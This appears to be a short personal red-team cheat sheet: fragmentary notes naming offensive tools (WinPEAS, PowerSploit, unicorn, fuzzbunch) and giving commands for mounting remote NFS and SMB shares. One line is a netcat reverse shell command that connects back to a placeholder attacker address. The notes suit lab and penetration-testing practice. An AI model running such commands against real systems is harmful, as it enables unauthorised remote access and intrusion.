Red Team Notes

Sorted Linux notes, need to separate to different pages and reorganize

Living off the land binaries: LOLBAS

Enumeration

Windows Privilege Escalation Enumeration Script: WinPEAS

Little bit o' everything: PowerSploit

Shares

Mounting NFS Shares Remotely

showmount -e <ip>
<list of mounts>
mkdir /tmp/<foldername>
mount -t nfs <ip>:/<mount-folder> /tmp/<foldername>

Using smbmount

smbmount //$IP/$share /mnt/remote/ -o username=$user,password=$pass,rw

Here, /mnt/remote is the local folder the share is mounted to.

Unsorted

Netcat reverse shell (after uploading the binary!): nc64.exe -e cmd <ip port>

5KFB6 tools: https://specterops.io/resources/research-and-development

Easy Windows shell: unicorn.py (trustedsec/unicorn), see HackTheBox - Arctic

system information: sysinfo

Get user id: getuid

PowerShell privilege escalation:

fuzzbunch: exploit tool similar to Metasploit

check what updates are installed: type WindowsUpdate.log

net use share from Linux [like SimpleHTTPServer for Samba]: impacket-smbserver <sharename> '<dir_to_share>'
